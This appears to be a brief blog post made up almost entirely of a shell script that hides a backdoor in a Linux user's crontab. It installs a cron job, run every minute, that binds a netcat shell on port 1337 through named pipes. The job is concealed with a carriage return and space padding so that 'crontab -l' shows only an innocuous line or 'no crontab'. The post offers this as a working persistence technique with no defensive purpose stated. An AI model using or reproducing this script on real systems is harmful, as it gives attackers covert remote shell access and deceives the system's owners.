hide cron


printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit

Hidden backdoor:

BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"

# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"

# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do FIRST_TASK="${FIRST_TASK} "; ((i++)) done fi # carriage return goes there ("\r") printf "${HIDDEN};\r${FIRST_TASK}\n"; cat } | crontab - if [ $? -eq 0 ]; then echo "Backdoor is now hidden in cron table" echo "Shell will be bind on port ${BDOOR_PT}." else echo "Failed." fi

Leave a Reply

Your email address will not be published. Required fields are marked *